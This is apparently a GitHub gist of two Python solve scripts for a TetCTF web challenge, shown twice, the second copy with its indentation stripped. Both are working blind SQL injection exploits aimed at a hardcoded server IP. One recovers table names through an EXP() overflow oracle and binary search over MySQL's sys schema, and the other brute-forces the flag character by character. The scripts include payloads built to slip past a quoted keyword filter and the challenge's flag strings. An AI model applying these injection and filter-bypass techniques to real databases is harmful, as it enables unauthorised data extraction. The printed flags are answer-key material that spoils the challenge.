terjanq/get_flag.py Secret

## get_flag.py
import requests

sess = requests.Session()

URL = 'http://45.77.240.178:8002'

payload = '''((SELECT 1,CONCAT({flag}, CAST("0" as JSON))) <= (SELECT * FROM `Th1z_Fack1n_Fl4444g_Tabl3`))+1'''

def try_payload(payload):
    r = sess.post(URL, data={'id':payload})
    return 'Hello guest' not in r.text

ASCIIAlphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz}"

flag2 = 'TETCTF{0WL_D0NKEY_MEANS_LIARRRRRRR}'
flag = 'TetCTF{0wl_d0nkey_m'
last_c = ''
while True:
    for c in ASCIIAlphabet:
        # print('try: %s' %c)
        t = flag + c
        t = '0x'+t.encode('hex')
        if try_payload(payload.format(flag=t)):
            flag += last_c
            print(flag)
            last_c = ''
            break
        last_c = c

## get_table_name.py
import requests, urllib, re, sys

sess = requests.Session()
fancy_console = False


URL = 'http://45.77.240.178:8002'
payload = '''EXP(
        (CONV(
            HEX(
                SUBSTR({variable},@wOFFSET@,1)
            ),16,10
        )<=@cORD@)
    *1111)+1'''

ASCIIAlphabet = "\001 !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~"
simpleAlphabet = "\001abcdefghijklmnopqrstuvwxyz"
HEXAlphabet = "\0010123456789abcdef"
advancedAlphabet= "\0010123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz"


def gen_payload(variable):
    p = payload.format(variable=variable)
    return re.sub(r'\s+', ' ', p)

def check_char(id):
    pass

def printInPlace(alert):
    if fancy_console:
        sys.stdout.write("{}{}".format(alert, "\b"*len(alert)))
        sys.stdout.flush()
    return fancy_console


def tryPayload(payload):
    r = sess.post(URL, data={'id':payload})
    return 'Hello guest' in r.text

#bin-search ASCII inside [alphabet]
def findName(payload, alphabet):
    a = 0
    b = len(alphabet)-1
    while (a < b):
        mid = (a+b)//2
        c = alphabet[mid]
        printInPlace(c)
        if tryPayload(payload
            .replace("@cORD@", str(ord(c)))
            ): a = mid + 1
        else:
            b = mid
    return alphabet[a]


def findNames(payload, alphabet):
    for result_offset in range(0, 10):
        result = ""
        pl = payload.replace("@rOFFSET@", str(result_offset))
        for word_offset in range(1, 200):
            pl2 = pl.replace("@wOFFSET@", str(word_offset))
            c = findName(pl2, alphabet)
            # print(c)
            if c == alphabet[0]: break
            print(c, end='')
            sys.stdout.flush()
            # sys.stdout.write(c)
            # sys.stdout.flush
            result+=c
        print(" ")
        if len(result) <= 1: break
    return


# filter
# preg_match('/and|or|in|if|case|sleep|benchmark/is' , $_POST['id'])
# preg_match('/order.+?by|union.+?select/is' , $_POST['id'])

# Th1z_Fack1n_Fl4444g_Tabl3
findNames(gen_payload('''(select table_name from sys.x$schema_flattened_keys LIMIT @rOFFSET@, 1)'''), advancedAlphabet)


# retrieve others' solutions
# findNames(gen_payload('''(select query from sys.`x$statement_analysis` where query like '%Th1z_Fack1n_Fl4444g_Tabl3%' LIMIT @rOFFSET@, 1)'''), ASCIIAlphabet)
	import requests

	sess = requests.Session()

	URL = 'http://45.77.240.178:8002'

	payload = '''((SELECT 1,CONCAT({flag}, CAST("0" as JSON))) <= (SELECT * FROM `Th1z_Fack1n_Fl4444g_Tabl3`))+1'''

	def try_payload(payload):
	r = sess.post(URL, data={'id':payload})
	return 'Hello guest' not in r.text

	ASCIIAlphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz}"

	flag2 = 'TETCTF{0WL_D0NKEY_MEANS_LIARRRRRRR}'
	flag = 'TetCTF{0wl_d0nkey_m'
	last_c = ''
	while True:
	for c in ASCIIAlphabet:
	# print('try: %s' %c)
	t = flag + c
	t = '0x'+t.encode('hex')
	if try_payload(payload.format(flag=t)):
	flag += last_c
	print(flag)
	last_c = ''
	break
	last_c = c
	import requests, urllib, re, sys

	sess = requests.Session()
	fancy_console = False


	URL = 'http://45.77.240.178:8002'
	payload = '''EXP(
	(CONV(
	HEX(
	SUBSTR({variable},@wOFFSET@,1)
	),16,10
	)<=@cORD@)
	*1111)+1'''

	ASCIIAlphabet = "\001 !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~"
	simpleAlphabet = "\001abcdefghijklmnopqrstuvwxyz"
	HEXAlphabet = "\0010123456789abcdef"
	advancedAlphabet= "\0010123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz"



	def gen_payload(variable):
	p = payload.format(variable=variable)
	return re.sub(r'\s+', ' ', p)

	def check_char(id):
	pass

	def printInPlace(alert):
	if fancy_console:
	sys.stdout.write("{}{}".format(alert, "\b"*len(alert)))
	sys.stdout.flush()
	return fancy_console


	def tryPayload(payload):
	r = sess.post(URL, data={'id':payload})
	return 'Hello guest' in r.text

	#bin-search ASCII inside [alphabet]
	def findName(payload, alphabet):
	a = 0
	b = len(alphabet)-1
	while (a < b):
	mid = (a+b)//2
	c = alphabet[mid]
	printInPlace(c)
	if tryPayload(payload
	.replace("@cORD@", str(ord(c)))
	): a = mid + 1
	else:
	b = mid
	return alphabet[a]


	def findNames(payload, alphabet):
	for result_offset in range(0, 10):
	result = ""
	pl = payload.replace("@rOFFSET@", str(result_offset))
	for word_offset in range(1, 200):
	pl2 = pl.replace("@wOFFSET@", str(word_offset))
	c = findName(pl2, alphabet)
	# print(c)
	if c == alphabet[0]: break
	print(c, end='')
	sys.stdout.flush()
	# sys.stdout.write(c)
	# sys.stdout.flush
	result+=c
	print(" ")
	if len(result) <= 1: break
	return


	# filter
	# preg_match('/and\|or\|in\|if\|case\|sleep\|benchmark/is' , $_POST['id'])
	# preg_match('/order.+?by\|union.+?select/is' , $_POST['id'])

	# Th1z_Fack1n_Fl4444g_Tabl3
	findNames(gen_payload('''(select table_name from sys.x$schema_flattened_keys LIMIT @rOFFSET@, 1)'''), advancedAlphabet)


	# retrieve others' solutions
	# findNames(gen_payload('''(select query from sys.`x$statement_analysis` where query like '%Th1z_Fack1n_Fl4444g_Tabl3%' LIMIT @rOFFSET@, 1)'''), ASCIIAlphabet)